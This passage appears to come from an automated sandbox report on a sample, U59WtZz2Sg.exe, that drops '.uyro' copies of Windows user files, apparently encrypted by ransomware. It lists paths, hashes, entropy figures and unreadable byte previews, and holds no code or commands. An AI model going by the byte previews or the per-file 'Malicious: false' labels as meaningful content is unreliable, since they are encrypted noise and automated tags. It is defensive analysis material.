Preview:	MSQMxU{L...r...nt.%`......1c..xJ...v..Q.f....wI.4z..kG.E....-.UbU.2T..M)e.&..M....p.7.-R...".g.Wz..A.......@...f..A9........e..........).F.......C....e....^.J.....m._r/. x..-...m.qG9.Z>..&.'.....E..=..v%..6W.7.8..U i...{.l&!.T.A....]..`}]..DENO...IU.......R.W.69_.ns......E,...kh..J...J..8a.......[T.H.no.. UT...eG.B.S...7d.].?..>T..H.......xO..!p...`.......Kd.a.'Ct.......y.4..r.ndZ&f.SI.u4...........O.8....[.....Y..r..LHp.......Z/...'....6Q..on.O..y..B.5.=Rm.6...U1..'..'.9.~...w.o.<.......ac....\....&.0 .E_.....j.G.I...y.w.9..OQ...\|"..E.?....s.........L..Z/...HC...E.r.y..b..\fu..U~...S....M..H.%...[...jy....A..D....,.G..........wuaa.i....O.+....7.pw1HmGI.7....i....4.......;...z..]..M..m...]X......#1........3...M..7.EUY.&hC<.U...d..[.y...n.C,..l...$...l..?.L..Yh..o.U..2..oAV2.4.j.9.....-.U$s...#....8.....P..5.(..VF!.;=.7..uSu...W.;....O`SlA...-.k.....G.o. .Q......@8...j....B.[.......c.c.D...r~EJx.v...NOi@.nr..T.r=R.....K.......C

C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_05.sqm.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1078
Entropy (8bit):	7.807452512824938
Encrypted:	false
SSDEEP:	24:AhC2EMpBGC4POQ5EvIaZHuJZT49goMsAE477V2ZtbD:z2hBGWYatuE9vMsoVYND
MD5:	DD6A962746ED29FE1FE0AB97135CC2A2
SHA1:	517B0DCA81C56BAD9F5C51B3AFA4E0B1DC397ACF
SHA-256:	834F8E82D26A4A9E3F21C5FFAA0D91A8EE31B019D78CDF390CD71D3AC07ABB5D
SHA-512:	008ED27BCDDA4791B5AB43B348AFEFB01A14B73145FDF36A4A6C10149B8376CE2306053E30842425122452A65E36B5C125C59095435501BC24CC78C4138C7AC9
Malicious:	false
Reputation:	unknown
Preview:	MSQMxp(....nR+1.sO...'......v..q+j3.....V.....d.ozHmT.ys..i.wXUf....f....'.....jr.t.A.y....;........$.I...e..C..3...p.@. .R...D...........f...^...Q:.,..........7.~@..&..aG..!.Z1...O...).w.#.......A....S..b...t:.b..I._3.K0n<.d.)....E-..%d..>_..M.]d+g.{.:].U.j.Hd.&.:m......>R....wa....h...?. K&.n4[..{....!..s.../9.].e..(C......}.....mZ....m.}.....=9.m.8......!.D.].J..Qv..<C3-..........LE.}PYZ. a[9...G.. .~...}..s....?.6.."=..aXZ.p....Q....A......-.i..^......8.....I.~S..\|.........'J.O,.]..K..5.#.F.`..m.\..r...i)...X.i../.'hbt4]E...z...a5\.$!1...b.z........!.=...3Qb.D.I.:.U......c:....T.q]).`..r3.....E.......0u.u.._...K..g..}..J.a.A(.(...R..p*..e$j.J..b...W..c.\u;.....j..3.....J.M).A./t......v._..p.%.ya._.#......C.f.#T....SG&.....y).\|.j..:.....3...d...H...qv..\.t..-qw.f..A.5a.mv.=..).......G@..I.Z.#.'?......5^.#!].b...,.....f.........c...O....4........`./T0..p.#.)Fn.d?.A.3...r...F....t...B+<..._.g.I.$.x#...t>.F:?O..p<.......d.`..68

C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_06.sqm.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1100
Entropy (8bit):	7.808250523626279
Encrypted:	false
SSDEEP:	24:FJ222tSjEUIo4/wvBUu5I2deth5yy+H0J8+5Cun/bD:FJUHUIoIwvBUu5I2I0EJZ5DnjD
MD5:	1CB62EAC24CF7229D8C290F5AD07EA87
SHA1:	125A9FD1ECB584C27C5DF035ADE0B3F9E0F28863
SHA-256:	439F1E656400AF0AAF77F90A74C0035D64CE40C0F0232BF0FA29689542A985B6
SHA-512:	DC6A262CE9FD0BAF0ACA9B03B28BBDFED9277D5C0AAC8E4878D0ED05E014F6A8BF89ABAEAE3CD39AD5A565E9AF7D5B1C5BE2B0A5E51DDC492EC1F28E0F04A20A
Malicious:	false
Reputation:	unknown
Preview:	MSQMx.1Ch=..U._.E....\.bm7.....x....)&.I.7Xz.rq.$ ..C...w.#..d.".o..F...d_...S..k36.F.<.noA.kW\|..;..........Q.\...%..n..P.1..U.$.+..1...v..k...b....F....-...Z.....BO^^.5.k..B...'.......}.]Z....m.%...~.x.2..d...p.\.}.@...L.i[...<E../]."k.,.M.....xv.....~.e.x.....Tb....L$.....g...BGr.H...02....p..(r...1....&...R.Q&.u>2...!+...p.\.3...."7j.Nh6.-..l..t....\|.p.Tz....Gf6...#.L.....t.....L...@3."K..z..~z.............(...E....m...X.TX..mV....Hj...N..?..z.rX..0....\...1...?.h.R..?0..4.....\.....y{.>.U\i...p.].+.A./^`F....Jm.............c......r..-$......W0........<I..M...9.1.G...`.Y......2..Dn...W.e....\|.b..z..6v..4.U..C.......7....5O..X.H..._F.k..6b.~=....&.s..Hy.Cg-..,1.1...Dg.....z.\}.u..h'.....Lk..s.U.kj$.N?....Sg......!.Z$.^.-.-<~l.......=.46...mv.00v.O.......A....+..K.....l<c......>85^c....b)4..Z.D.....}.D...]8.%......D.A.5v.H..[".L[.Q%3....K......+..}4.eS...s.O.4xJ..R.........'.>"$..{.\|.!Y....j\|h.!A....Au._F..=.I2..\|.'>

C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_07.sqm.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1078
Entropy (8bit):	7.797504808246656
Encrypted:	false
SSDEEP:	24:BU/NwxeCgP10vYEM7xX7//+JBfF+E1O+9pcVsbD:2N4e50HM7R7n49c+9pcVmD
MD5:	3867312CBB3D08D2AE4F0B14B9BDCF11
SHA1:	C4402BCBAB4DF94A0D48D276EB1D125C8A486344
SHA-256:	C07E53609BD1BA091C1C86849BA1F9B3E5E905B955C281463B14B1B4CA1417A1
SHA-512:	C468DA53886B777836CB7CA246850857EACFB85BFD27F6B89F456865C2903EDF1D9DAF9B1F6DCAA43751DD9D2A4C0805934EBFC31BF201C157D9D1BFEFCD5422
Malicious:	false
Reputation:	unknown
Preview:	MSQMx.._s..7tw..(.>o.Z...c.!z.(.....1-xA\|......yW.6'.g~..>...'.C...."..o.""...w.P...:...jL..#.....>>o!...:0.;...O.N+c.u.)_Qh..9..=..2.........Xg.5.j...M....1......../.f\.,.co_O`Ir[...r.U.Z.T...z..QqIy..`+..G..W7^p\B..p..S.......o..........e6.....!...,^....h.........../ST!h..0.1Y,..-..v`.........M..}uH.fa..noew.~....1fE....G...n. .C...>l.9.S..c.K.....Y.`<.O\s,........g%....3}..[V..Y......,..S..........z..D._..G........1g.;'.......E..-.x..4.w./^...E.iT).b._.\|..V..-'.e....y.eX..0.:.~....n.....'.0....o.(..T.d...Y=.]8...0.=M....nH.Pl.l.1.S..r%J..+.o...V.k$>...oX....6W.X...R.k.t5..!...U........mw.?P.[.0.X.1.....8.....30....i.......m.T..Sq..z.......E...,.af....<p...y.j....d)J.82W..,........A.B$.D..Z<6.....f.8...UW98l.P..Fg[...fx..."...`..HX.]...VImp.w.....p~k]..E.Dc...>IVZ..z7...F.<.48..?.....Z__...TC............Ii....i...%......B..../!]t.j.......Y.<v.7x......Z......U.i$Wu.?.....+.+.${.d..!y\....Z'...n...U2...D...J..gFy.\..!.....@

C:\Users\user\Local Settings\Microsoft\Windows Live\Bici\_08.sqm.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	1100
Entropy (8bit):	7.815198307130605
Encrypted:	false
SSDEEP:	24:Rim6NT8Wh5ut2dFNB4eawMVyTYXqCZwL+KpDO8wPqYbD:R84WPrd54eawMI+PwiKBORqCD
MD5:	C4B0C3AC49AD4A6CF78442FFA2C589EB
SHA1:	120D0DB3D32C373C215CA6118AC128B08F62C7A0
SHA-256:	CC41AA87FD2A8AAEA2A246062357729ABDA8DA324B4F23451089B9E2515BE9B3
SHA-512:	BF620B4E0FE2699E54B86ECBF3AFD41A7A9FAD432A0F1CC4B58AA01F4E47510C2CDFDE9DE8B558A56BD240B86F39E6B88CED736C1D77CC7967872291E0D4C014
Malicious:	false
Reputation:	unknown
Preview:	MSQMx......}V..Z VvDY.....e.......#..j...[x......{...M..fj...+..e....J...p:q`..K5...5..Z.......}..N.s..[.............0.g.e...yO...G...../B..a..K-....w....#:.._....XN.Yezv...............m`."C{...R.X.KS.....Jf..b"...4K!.._0.@@0.....V.......}}.e..H...z..2:I..uxyV.8...1..]..q9.K:`(..I..;$..k.A0.1...8.<4..5...7%....B...7....._~.."..t...T\|6K...:E.g..{(Nm......!i...Wq..b...h.8}4.I.0M..2.d..v`.Afz6eE!9E...t...bE....9..n_V.].....p5...2<.A..>Y,v.....!..;.'........b...4Ci.L.0.5....7...q..9.h.58k....Y,.?..yzA..;..+.....N....P..m!R.t.y.LHC.....>........dk.._...$=..._.'.^igqiM.....oo...,..R..wx..R.T........=..X......f.7.f..c...m[....=..,.q..K./y..7ga..$...p........ol.....Tq..@\| -..1.......U...saQ)......O.wT..b].p..=.H..s#..k......"E\|3`.o..f.....&.a....S..\..zE.w.......xY^Qsr./.....u...o..]P.I.J...#z....\|G2:x.~......=.1....%.i_...q..g.-8).%...4.\|+)KX.....-e,..y'*...x....f....7....z.Q..O...~..@k...r.5..0........s\|o..pK;....i.y.^v..cY#..\|...T.;.U.

C:\Users\user\Local Settings\Microsoft\Windows\1033\StructuredQuerySchema.bin.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	419699
Entropy (8bit):	6.334332125847834
Encrypted:	false
SSDEEP:	6144:tdyfH1EhKhukWL57CWnF35jcW/yozbi+z4b8ahQdcFFcWAF3niI+oA0J:KH2ghYMGNldzbi+wOcFFcW43iobJ
MD5:	4353BBC19E9D7A9C2E2999DB72ACFB25
SHA1:	06665D88E4F12831A67F75BEB1EB6254201CF9DD
SHA-256:	CC2DAD395706338EC32DF7D85A037ABCD6901DDC2302427197ACF21C540F89F2
SHA-512:	0846D63C5F45F62591A0393C8D45B1A2B31A8250DBB5D873D9284482337CAF6D282362FF354986AA6E146C813D3D354E6E1823E8DE8DD45B142B156FCD06D07D
Malicious:	false
Reputation:	unknown
Preview:	...P.l..h..).....'..nP...K.p..u.[.(...;.0].u...t....1.Z.D...XJ..o^..[.Qc0Qw..w0.`.ml$%.b)id..5.$.s2.K.M..........K.n.6[....-.dV.....#].R&..H.....K9.FWb..,..ly6/..:..W..xJ.].....u..>R..F..(..!Fp~..&.dO/...h...S....H.m&.!.Z).......u.f..:.$dO......c.......2.6.Y.......L.;.B....l.j#!..........~....X.:%qv!.."..C..`.?......."..p......./`=..W..r.(....v...5.).B5.$A=..Mas.zf@.Z^}..*....j.WO..l.h2....$b.>..F..P.t...c3.#.7..YcW...I!..6>..........L.....I.....M..P......TA.>4.w.tj....a....a.Q..$......... uy.n.O<p...[....7.....tF... W..3X.[p.].^..Sv ..[7.B..\}.......jF!.U...................Y...X.2......iB........).$N-.K.z`...p..y..R.?..%y.5...#....g.......'W..}C.B.:/.^\!.h..'....ak..(~.......S..J....=..-z.^.rE."=..r&..&y.z..[]..(Y..x.Hx...,.....Y.s..g.qd.7....v.`.V..+=E.,O1....B.j`._x.dH\.B+..>h.......cQ.........W.5.~...:\.P.P.v%...wH..`.L.}p.@....=...6......h.y.7!9...{..;...: ~.i..j_"..7^..hn....^b....Z9.'...u..bqPM.;C@m.....o.......&cy&5.5.....@..=y

C:\Users\user\Local Settings\Microsoft\Windows\ActionCenterCache\microsoft-skydrive-desktop_16_0.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	3385
Entropy (8bit):	7.939680145866848
Encrypted:	false
SSDEEP:	96:onrAwfIBFcIR9xF/K2wTMf4zITI7dC5vt8:orJK/xF/KtYf4z8I7dCJt8
MD5:	B79A529622152D9FCE8DAEC73728F218
SHA1:	9AFAB52B37F709B9CE031A60385F77970169105C
SHA-256:	6D8329DB79A3036041508BDB98BA11B59D3131F7EC813C8C206F541FE3E092BE
SHA-512:	3F7321274A15136BAF783EE63E1485B5175F2947BBD491E225680BE6078D29E65693E49BD9BB4DC404650DF7BEEFE8BE83BE18E8CBFC8AE445A33F7771343799
Malicious:	false
Reputation:	unknown
Preview:	.PNG.{.....V...I~Z._......%......N.etN..E.....m..X....a....r...!B. .....V..6....x.B..k........A......9...+.I".uz..!...X.Y^I9(..x.\...........N.b.`.....vy\..{O..j;....o}.z".,.N....1..[4.`...v.MOC.....^...4.F8.."..A..Z.......^...?..;....KV.'.e....d...-.~.ne......v...\|f../.$.y[.`&^.Jy..w............t.....V.>/.4O...'D.>..>p..!. 9..(A.^f'....1...8..k.a...OMG}....{......\|./=..6q..M.s..l.-.}.M.k.I.N..h..1.2.0..$.!3$}OTX........}..>..M+.......I.L.,....]eaW..YG..C.93....b.g..8...N..T....KKE.b...w.x.u. ...D....(..........Ptn.O.>.Q....#...e............d.....C...X>.2.W..T3..Uv.Rm.{45.1.J.b..F.n....j...Q....s.........JM..?+@e.....0KQ`.fw..qx.i._=a.<.(...$. ./7.tO.x.M...L....&..\|g......Y.....ey..m.}.R.s..o..(...O.O.l.e...B?..V......{...UG....A.PNE.$../.sAb......nt.U.y...Q...PU.>.....}9.~H{..a...q...1E3W....h.<......d..La},..d.>.q...2.,[..j".....r.H..(..A..N..7i.5#.5..9....~ ....h.....X.9.$.%..>%X.b......!2..n%.s7.....$...v".._.EO.YquhM....G.b..p.;..&-

C:\Users\user\Local Settings\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_11_0.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.974504076742161
Encrypted:	false
SSDEEP:	192:Jqnc1nDCRLjVWcgVJC/thhGsc1LMtmXjOQUnqz:4nc1nDCRfAdUDyMtUKzqz
MD5:	8F56C3AD1D91BCFDDC1FAAE37933190D
SHA1:	FA924815BCCEADB4A2C018D53AA9B2F5EAEB13CB
SHA-256:	6263538E64678C500EFE2DC634C2EA016EEA4683435EC94A36F68600ADE5F908
SHA-512:	27E820B99EAB39877F81CEFCA6BCFBA4819D6DF2C7315CCA93848B02AB0557F7C076C58CFFEBEB2A830387CA7C5267072B962B66821C1BC4255F12988426D1A3
Malicious:	false
Reputation:	unknown
Preview:	.PNG.....Q.r.#.Q.f.sX.k.......hw*D?.Y..G.C>K...I...o..^.\..-S1.&c3.wK....;..,..w{t...(.....tkaWJP.?`~......t..b.H.W..e.y...;.x.z....G...\...Xd)...{.gt.\|...>...u$...E..K....iQPDK.=v.A.V.K.@...w.&.e.Z$..GTI.D..A.H.+..?p.....h.e/=..&<..6:.x.7...0.c.....j.\|.....bRMJ...,\.=.Y..cKn.....-....m.P.!...$...Q.,...x9.W=.j.0-Pl.R....5.).:.....l.......J..@neX..P..@].rf..0...0.CSd........;v......Of..O.{.a...zDu....xA..N..4A.w..............g..4._..s.k.....v2.>p....Y..0..W@]P..T..O.Z.HmR.3.2.#.....k..P"../..N.z?V.:.-Y...b.'.e...U...x'..."....x..-?$...\|f#6.1&.s.)............6z..wv...e"....9..e.Z......drl._./.O.5m..e..iw....O.....y.Q..O.~......D.....h[..u.C,...Q.zp..5.{.%,z.Fy..Mw...aN...'.wk.G..s......5.......P9.#.j......t......N.k.&\|.J..$..BB..e\|..I..`9..&..?d...xU.h$z.o.#.T.`.W.E4....(x.r.E.....{\|..%<..S.....J.gs.]..Y.y..L.f.j..]...s.u..k.<...oC..c.k.../.)...,I5.ge>/3.b.J-.N>.e........P.4..j.'~h:.~....p.e.63.c...2.$.(.p&....p..1..dP.m....VG.".M../....

C:\Users\user\Local Settings\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_17_0.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.9764923825029586
Encrypted:	false
SSDEEP:	96:9M5Y5s+MeRfFKE4K6jjS1AGPOtwBflnbg7Ia/dk2Xri7V/yZbtgHAXrOGo92S:ACMeRp4QAGGElnEv/Sgr3CgXrSZ
MD5:	CC6BE65B6F67CF44BEBAD4435FBEBB89
SHA1:	2E2C76A64970B5DADF22FA20BF31DC740887295B
SHA-256:	860BD6C70312C9BAC07BC2AFD2251C353380CF48F54A7444F4FABD27EF127FB4
SHA-512:	1E9BA382D1E94713B21594C02E8D8387E28FA23A85A66793CEB2DEBAE98BD4D6854F080FC05B126FBF519AB31A2B3636DA466C79C21F43053EFD7A17A0E8479D
Malicious:	false
Reputation:	unknown
Preview:	.PNG.A+C.k..U..u...\|;.f.\|t.......x0............!.g)C..........9.(.."...R....Od.CU,..(..X."U..#...l.unKv...0...-Y. B....Iu.#[..N...`C...$x....(.s..0p^.]Z.....N.0....^8FoPw.....j..!....l.B.QWOs;... v'[h.]RO.r....T)o.\..\...5...q@+a#q..Le...t....w.N...n....._....x...<..;1c......\|.P.}xP.C.e@....{'...U...<....`.;.{.........E.\|F'l......C.....&}.O.W.....s..<..q...#...-Yk.}5.Q....\.g ......S....}(.......7..K....v.u..X....iW......)T...\|,~V...Y.Lq&..O.....u..j..v....g=.Q.a..{......y2R_...(.}F.p..Z..-....P~r.p..S...O...5.&.m.x&p~z].!......3...E.~l.RM..g........4\@THs........f~...L..^._...5.X.a.~e..#.......t.......T..F...V...'..5/D.,/..F.....y..Y. .@I9.u...+..K.F.jV...iF/...$.$.O`:2,/....F.._..._...im.D.1W.D......=...\[.@.6...2..^..'.M%m..L....b.....hO.....\x;.V..w:..F^...L...F...uA...n.B.....tb..,.@..... ..nr.C.(.:.Z..T..v.".S..Y..u..S.N...Mh0...Eb...<$N..Z@V..G.Qn........6.?.....+.i^..j...M...to-.....)`.... ........{....U.(\|

C:\Users\user\Local Settings\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_22_0.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.976944298742274
Encrypted:	false
SSDEEP:	192:SsxaxkdtH32WpdLXfjf94qwx1F0ml7tOlLBIJW+m11aKXQ:Ssxax2tX2Wpd/+qWYyJOds5m1Q
MD5:	0B1AA313F37F287F46A0C6008BAE69D2
SHA1:	E89F666BA7447D151DFD167936D7621DEA973E37
SHA-256:	CDF0F65ECDCC8C57C9A86A784D786209B91CE91D42EBDD7FA2C51D63D7ED2C09
SHA-512:	E644D1ADB72B4911350BAFA25F86861D1148DE3CB28094A07307233458EE0F7FEA36816A3756D5A40E33EAA3F97ED9DABD329F9ACFB0CDB0E0B1B4B77F5851DC
Malicious:	false
Reputation:	unknown
Preview:	.PNG..M.........5-.....MT.....6-.M[..N............J ...N.p.o.~r..y2.6...?,$K.......X.RH._I..o E...v.B...e....#.E....i..4.......z..\'.m.%......A...=...d....W...1..P..Qu.l.......Cq....Vb`&..v.t.p;...B.....QE.. .R....xO.]y..).N...0.....a.......A..1P\|.Y..v..._..[)(....a`..aQLB..ke.!..^.-Q.z.r..p).C1..sE8..c..Z{..g...z.1[..#....t@.$.zA..K.:YiV..h....U.b..........(=...E.fmU........A..3.-.@..Ah<.Zb.5..#.........`(...}H.V...\.....;........<W....3'9Fo.dy...\....3.a...Z....s]f(N."..x..iyH....2O....%..;.<Z)...E78...,.,...{..C.....Y ;...p2...a)...V...\..k..h}X..M......F"P.......Qe.....z.N.=w9..)"O.......j3....A.s..U..n.vY.....C....$.+...g..Mo..m....Q."....x..{_X.T`.....G/.....o.........C....5Bpo!E...x...&..=X-...r.Q...#+..l..J.=....../..s.f+=..T[,2..w.X...T..w.w.z$..*3...........{.&..>.S....s.n..^.Db.}EC..#......k.V.........%....p.~-.D.H5$.....`"s.N2....~.=.[o...n...&.7..:~....!3\.f....Z..U.l.j.(.s.E.,.+.y..9....]...nN.qk.$.3U.s........2.56f(...H.<O.

C:\Users\user\Local Settings\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_23_0.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.976626938255001
Encrypted:	false
SSDEEP:	192:IdS43KPnJPnKUWgpXtZTV/FT43r3CVRkKSq:N4UKqPZZoCVRf
MD5:	8BE33E13903F96C2FB121ED6F06EF1CC
SHA1:	DD75638DADA33BA6091BAC9D12F84136136B73BA
SHA-256:	E1EB3B417D60CACE0D1F03D0CFDF22A81EC0E930A87486F91F4BA563F9C5A467
SHA-512:	C487BA3541F1DD102AD6BE6BDB072688D406CC5057CC35FBCF0953E93CE788212985699A5E851F2F19CA5EDF5D856E0F45637E88FA107B5FD25CA41B8EC36C95
Malicious:	false
Reputation:	unknown
Preview:	.PNG..WF...V.6.u....K.QZ+...z.....;$.G.O;....p...m.vp..EY4X..yO.._...7/..pa)...T.J..gW.,..,.0..u.....+v..R.J..?.C/.P...E.`.o.GC.o..e..X.=.La>..."..\.m.oWJC...U.....L...%.....J8W..Qo Y.4q..0.Q.....Y.r..E,.;5.~..[.$F....#.....w&Kb.....fn..?DxR..?..O.I.......`.>.X.....#....?PG}............6.F..a2..G.6./t].-.] ...ru+[..li.!K.....D.....bG.0z..J....g6..._...dX.f..._]....{..Xp...A...7....G......T..7....#;......h. k[....55G].....:......B....?..E......$e..'....[f....B<]...j...)....C.5t..:..q.w.......I.>.G&.\|.H....l.....\|.k..Z.....Vi2..s..:D.-.(.M.=....P..<..lH.Gh..U...I.d...uN.d<....F...]..JxH.J!..\|]1..^3yI.l\|:...5&&!..i.......}2cI.....V..[....x........#.....&u.....C...4.-b.lf..v..y..,8..v0.$.}.....=...S.>.F ..e-."3...=0.xw.....H. .U..X\|U.....~...o.P..,....A.&.pT{.......K}....n."e.....i.aKQJB)I....U.Kh8._i.k$6-y......o.xm.)..V...-...B..AI.....[[..K{...TPo.....3.5.....3Lq.`.;..PCWBUK.x....e@,,Nv...w...M..'.A]rS..... .!..+.X....2ps$.t.[..yf.E.W.

C:\Users\user\Local Settings\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_27_0.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.97621566324291
Encrypted:	false
SSDEEP:	192:yY4Uos3M7uCL+TrEQ3HNGiun/YUMjlXdrr/X6oQ:y/UbJC8EQ3HYI7ZQ
MD5:	9AEEA43EB1B1D21DC5E3E85AB5CEB5D1
SHA1:	A2E218A27C5F4641F0CC441BCB3E3B9D98F1BE3D
SHA-256:	0B3C9903C12404F1661C950F0C689C01C911A5B1A34C7A815D56C5F7042FE29C
SHA-512:	5B8653A75A51963DF2AD07B6589F9BD66A6C4785284C04ECC8368FA9626AE3C0D0DB61C0961DD641B615A5ED0FA0BE0E629CBF98FD76CEFE4BD3887907055D4B
Malicious:	false
Reputation:	unknown
Preview:	.PNG..`...0E6..t...1.I...m..d.e'...[.U..O..AcV-.....D..3.%.9.&..TFQ.[.$...'.....r=..ZE<...z..w...t.......f...[..........?V68.]?1..O.lOp.Ge(.-.h.{k..........~.X...%.4.<..AX#g<..@ds..P.4.t..sN\|~u.&].....>..p-.Sw..#....j..2=d.....vY.o.....~.P.j.[.?D~,...f<.r...La..-A!V..[.=.;.9.3:....y.f.wuj...............J!.q@>]%....`\|.C{...x....Z...=%...O...A.`...S...E.........~A.o....5.D!n\|X......Ui.......:.M..\...v...y....9..L.p1;.....\.......?%.6..8.J.....o.k..&.3}.H..dD..:...]..z0.!:.Vm>.@.P..:..b.....n....W}..w.`......0(!...F.."2_z.....iq..;.Y.1U..l..S....e.G.]xJ.....5s2y\.Z\X....W..' ....=^...q.~.....F...D....f...uf.."...es..rdM.s..M.....O.\..q..tWA5...S.;..8..y.C.Um..Iz....G%.C^.3?...P.Ri.?...-......0....k....> (u.y..Y.BGU......oWv.)..J.vH..}...z.e..!..dx&..T..Q.f.1.....D.d{....w...yB....C.r.V.J...".7....I.....Y..}Je{..}qK....F.u.y,...EBP.....7].....k.^.D\|.9...n6J.J .~8q'.oz.o...X.sOf7Ps.?.M..:Nv.p...."+...+.{x..&.....9!..y`..SZ.8...S..4..l..zU

C:\Users\user\Local Settings\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_37_0.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.973445880751033
Encrypted:	false
SSDEEP:	192:0JrLuijMLyay/9Qspo5OnUk2HOqe0Q0AseCCkV:oLuijMLya89ppoAnU+2QSecV
MD5:	3A3170B09A78EE265AF7DCDE17143DDB
SHA1:	36AB422687823EFB82978A88CF45DD6DAA8123B8
SHA-256:	3D5FF36BA8726D4283B416C35BB9574BB890E090DC00C3D23847042B205C7B09
SHA-512:	3EE2931D397E46D6B4B4B69B9A3F4AF74AC4FC4DC40C29A7D37177CB82476DCF4DE45532133459351A2020434594E5A0F4125D2F3B6F905B2F34F89ABE997172
Malicious:	false
Reputation:	unknown
Preview:	.PNG.. .U.cw9b...".ch........l'i...6..'f.JM}...bw........w...0(.S..%.....:Zw...U....S......<,,I...q..d...R.l.-....B`S......~.U..'hN2l..T.Gx.M~q-.&.AA.6...P#.FX...H....V.w.........\'.%..:$!.:..R.#k{".a.........K04....s/b..XL...X.W.....f54.M..^..O-.y=.aD..!.u.az..W.^?.Y...6.3.0.2..t....H..b.,G.+...z....i....O..x]..w....M...a.....+.~...P.r.S6....qe#..P...xyi...f!.......QQ...pJ...9JS..EW........{<.[6.....h.}..0iB.;.#ZJ.l..@.-..iU.&A.O..m.3..*<...\|.xg...C...y...zD.j=..wm.....m....r....Xv.BE}...,0.w+....7......F..r..O......nU.ou..................!..k..4....H".:.\},1....{.0....[.d..QVIq%5+!3s1....Si.\|.~.h.G.6...!...x..:].....B...Z..u...B..Q..(\|..YNmw ({......F..Y.q.....KmSV=I@.#\|.or..t.@o.....;y@\|..O....GS..a...r.....>..tJv........l.+f...6."kw.t...bi`......;........7.fx. k7smd.z.'..Y....9....KV:.n.Fpb.a.......:....)I...l...v...9=i.......B.....>.......#m.F.5.....v.....ie..P..........f=.U.H.83../..v..I2Yj..q.r......s59..d.I~..p`...^.TM\..

C:\Users\user\Local Settings\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_38_0.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.9774385967595896
Encrypted:	false
SSDEEP:	96:84q429SqdGJr1Dt38QBfbk8RrMvynseDuSpr72HnrSrV8LYUxaMTQziJoCVH597v:l/Hvjfbk8ViVSpr72mrVKYIh1vN40r
MD5:	00B94224CFE6C4A21E9E9B39113569D6
SHA1:	7BE8B062AB2AF94EE5ED05A8FDC948275C8DEACD
SHA-256:	231394537189C5BF17A126E43BB3771BD8A2AFD36367D9165EF20D5171DBEEB3
SHA-512:	78D6D97BB25A8BC4DD0D56B31EADDA17D8AD90A6155C541ED0D0418441E682E2295555B1F8E479C79D99050CE8A1B89FC849BB594D347E698E1D43629E088E4C
Malicious:	false
Reputation:	unknown
Preview:	.PNG..l..W....&..lSs.\|......\|.....XO..T..f8.%C2tJ&'...s..^.4......q............u..p...<..p.....F....V......E...(...8.C.<...ee6...Z..l....T..V....mv...'. ...=...@....r.6Fu..h..x.s.F.Yg.....Y.....7...Y..p<H..........H....W,...Y).K.sQfeOz1....4..I.......y.n.MO..K;.E..}.........LN.2D<.N...u....<...C..\|w.h..l.Pe.L.Mr....J.uzk..s..Nm.k.{..D1{.Ri......._...Y....N[.c...@...?.uc.K..[`..Fl/.k6.....8...u..d...8..".c.q.91A)..b......p.~.B.....[..F..c...\|I..&...[..1ZZ....G...D.$..;...;...6..V.O........F.0.GE...8.........fW.\.....L......J...W.3.3.b.C.N..a8$..........,z.....s.s ...#<.....6.........i..}....g.M!.......>N.....(.G......]....mchTj...].....T...^...-.].W.,.d.p.h..........4..M..9.7_...//.(.?..r..]A...w.V......\bom.T/S;f#d.=3.a..e.I.>.......d.x.V...C..$:.6.b.B.I..6.{.6....j...c(I.m.k.\|lyK....C..Xh......_.x..+'.ho.%....^/_Cb..........s;L...o..&.S2.'..tb.......]yL.....s.!...?w('........0\Y..Z.s.\|...=.C......@..L...AO.....'&....6...v.]%.+Cw.

C:\Users\user\Local Settings\Microsoft\Windows\ActionCenterCache\windows-systemtoast-securityandmaintenance_9_0.png.uyro (copy)

Download File

Process:	C:\Users\user\Desktop\U59WtZz2Sg.exe
File Type:	data
Category:	dropped
Size (bytes):	7207
Entropy (8bit):	7.969620128704524
Encrypted:	false
SSDEEP:	192:pkfnCQ6iP3BB1ySSN7H7CgIgM8stB3aZyCCfolnhD:KCQ6iPxB1yz7H7CgI5/GNdD
MD5:	E2E8B80EB9496D52A6391F9523082566
SHA1:	716ED373D5C740594ED2266EF6E9420B896B1C4A
SHA-256:	4F1E7B8C99205A704D3EEB223CAE248C625B80DC8FDB09CD1CEB3CDBFC1FF176
